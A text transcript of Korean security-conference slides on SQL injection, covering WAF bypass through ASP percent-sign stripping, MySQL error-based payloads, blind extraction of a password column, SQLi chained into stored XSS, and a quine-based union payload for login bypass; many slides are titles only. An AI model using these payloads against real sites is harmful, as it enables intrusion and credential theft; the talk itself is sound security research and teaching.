웹해킹이라고 무시하 는 것들 보소 -...
TRANSCRIPT
![Page 1: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/1.jpg)
웹해킹이라고 무시하 는 것들 보소
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
![Page 2: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/2.jpg)
SQL Injection 끝나지 않은 위협
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
![Page 3: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/3.jpg)
Who am I
• 정도원 aka rubiya
• Penetration tester
• Web application bughuter
• Pwned 20+ wargame
• @kr_rubiya
• 백수 · Jobless
![Page 4: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/4.jpg)
• How to find vulnerability?
• How to exploit vulnerability?
• Exploit more smartly
• MITM SQL Injection
![Page 5: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/5.jpg)
What is SQL Injection
SELECT * FROM users WHERE name = '" + userName + "';
![Page 6: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/6.jpg)
What is SQL Injection
SELECT * FROM users WHERE name = ‘FooBar’;
![Page 7: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/7.jpg)
What is SQL Injection
SELECT * FROM users WHERE name = ‘1’ OR ‘1’=‘1’;
![Page 8: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/8.jpg)
What is SQL Injection
SELECT * FROM users WHERE name = ‘1’ OR ‘1’=‘1’;
![Page 9: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/9.jpg)
Easy to access
![Page 10: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/10.jpg)
NT Web Technology Vulnerabilities
![Page 11: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/11.jpg)
But…
![Page 12: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/12.jpg)
![Page 13: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/13.jpg)
Why hard to prevent
![Page 14: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/14.jpg)
Why hard to prevent
![Page 15: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/15.jpg)
Why hard to prevent
![Page 16: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/16.jpg)
Why hard to prevent
![Page 17: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/17.jpg)
Why hard to prevent
![Page 18: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/18.jpg)
Why hard to prevent
![Page 19: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/19.jpg)
How to find sqli vuln?
![Page 20: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/20.jpg)
How to find sqli vuln?
![Page 21: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/21.jpg)
How to find sqli vuln?
![Page 22: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/22.jpg)
How to find sqli vuln?
![Page 23: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/23.jpg)
How about AEG?
![Page 24: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/24.jpg)
How about AEG?
![Page 25: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/25.jpg)
How about AEG?
![Page 26: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/26.jpg)
How about AEG?
![Page 27: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/27.jpg)
How to find sqli vuln?
![Page 28: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/28.jpg)
How to find sqli vuln?
![Page 29: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/29.jpg)
How to find sqli vuln?
![Page 30: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/30.jpg)
How to find sqli vuln?
![Page 31: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/31.jpg)
Indirect SQL Injection
![Page 32: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/32.jpg)
Indirect SQL Injection
![Page 33: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/33.jpg)
Indirect SQL Injection
![Page 34: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/34.jpg)
Indirect SQL Injection
![Page 35: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/35.jpg)
Web Application Firewall
• 웹 어플리케이션을 보호할 목적으로 개발된 공격 차단 솔루션
![Page 36: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/36.jpg)
Web Application Firewall
• 웹 어플리케이션을 보호할 목적으로 개발된 공격 차단 솔루션
![Page 37: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/37.jpg)
Web Application Firewall
• 패턴 기반 방화벽
![Page 38: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/38.jpg)
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1
‘ and ‘1’=‘1
‘ || ‘1’=‘1
![Page 39: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/39.jpg)
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1 ‘ or ‘2’=‘2
‘ and ‘1’=‘1
‘ || ‘1’=‘1
![Page 40: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/40.jpg)
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1
‘ and ‘1’=‘1
‘ || ‘1’=‘1
‘ or ‘2’=‘2
![Page 41: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/41.jpg)
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1 ‘ or ‘3’=‘3
‘ and ‘1’=‘1
‘ || ‘1’=‘1
‘ or ‘2’=‘2
![Page 42: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/42.jpg)
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
![Page 43: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/43.jpg)
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
?id=‘UN%ION SE%LECT 1--;
![Page 44: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/44.jpg)
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
?id=‘UN%ION SE%LECT 1--;
↓
?id=‘UNION SELECT 1--;
![Page 45: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/45.jpg)
![Page 46: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/46.jpg)
SQL Injection + DDOS?
![Page 47: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/47.jpg)
SQL Injection + DDOS?
![Page 48: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/48.jpg)
How to exploit vulnerability?
• Classic SQL Injection
• Blind SQL Injection
• Error Based SQL Injection
• Error Based Blind SQL Injection
• Time Based Blind SQL Injection
![Page 49: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/49.jpg)
Error Based SQL Injection
• 에러 메세지를 클라이언트에 출력해줄 때 가능
• 원하는 값을 에러 메세지에 포함시키는 기법
• DBMS마다 공격 방법이 다름
![Page 50: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/50.jpg)
Error Based SQL Injection - MSSQL
![Page 51: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/51.jpg)
Error Based SQL Injection - MySQL
• Duplicate entry
• XPATH syntax error
• BIGINT value is out of range in
![Page 52: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/52.jpg)
Error Based SQL Injection - MySQL
• Duplicate entry
‘||1 group by mid(version(),rand())having min(1)#
• XPATH syntax error
‘|updatexml(0,concat(0xa,version()),0)#
• BIGINT value is out of range in
‘--~(select*from(select@@version)f)#
![Page 53: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/53.jpg)
Error Based Blind SQL Injection
• Query 결과값의 True/False 여부를 알 수 없을 때 사용
• 에러 발생시에 예외처리가 될 때 가능
![Page 54: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/54.jpg)
Error Based Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
![Page 55: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/55.jpg)
Error Based Blind SQL Injection
select(select 96 union select
ascii(substr((select pw from users),1,1)))
select(select 97 union select
ascii(substr((select pw from users),1,1)))
![Page 56: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/56.jpg)
Error Based Blind SQL Injection
select(select 96 union select
ascii(substr((select pw from users),1,1)))
96,97 return -> error
select(select 97 union select
ascii(substr((select pw from users),1,1)))
97 return -> no error
![Page 57: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/57.jpg)
Time Based Blind SQL Injection
![Page 58: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/58.jpg)
Time Based Blind SQL Injection
• MySQL
sleep(), benchmark()
• MSSQL
waitfor delay, waitfor time
• Oracle
dbms_lock.sleep()
![Page 59: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/59.jpg)
Compounded SQL Injection
• SQLi + XSS
• SQLi + Authentication Bypass
• Out Of Band SQLi
![Page 60: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/60.jpg)
SQLi + XSS
• Insert, Update 가 가능할 경우 Stored XSS 연계
• Iframe 태그를 통한 브라우저 1-Day 공격 유행
![Page 61: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/61.jpg)
SQLi + XSS
• Insert, Update 가 가능할 경우 Stored XSS 연계
• Iframe 태그를 통한 브라우저 1-Day 공격 유행
INSERT INTO board(no,user,<script>evilcode</script>)
UPDATE board SET content=<script>evilcode</script>
![Page 62: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/62.jpg)
SQLi + Authentication Bypass
• Union SQL Injection
• 재귀적 return값을 통한 인증 우회
![Page 63: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/63.jpg)
Union SQL Injection
• Object Injecton
• SSRF
• XML External Entity
• LFI / RFI
![Page 64: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/64.jpg)
재귀적 return값을 통한 인증 우회
![Page 65: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/65.jpg)
재귀적 return값을 통한 인증 우회
s = 's = %r\nprint(s%%s)'
print(s%s)
![Page 66: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/66.jpg)
재귀적 return값을 통한 인증 우회
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
![Page 67: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/67.jpg)
재귀적 return값을 통한 인증 우회
if(queryResult)
if(queryResult == input)
loginSuccess()
![Page 68: 웹해킹이라고 무시하 는 것들 보소 - SECUINSIDEsecuinside.com/archive/2017/2017-1-2.pdf · 2017-08-19 · SQL Injection 끝나지 않은 위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM](https://reader031.vdocuments.net/reader031/viewer/2022041900/5e60002896b8703f3a4f5f10/html5/thumbnails/68.jpg)
재귀적 return값을 통한 인증 우회
?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))--',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--
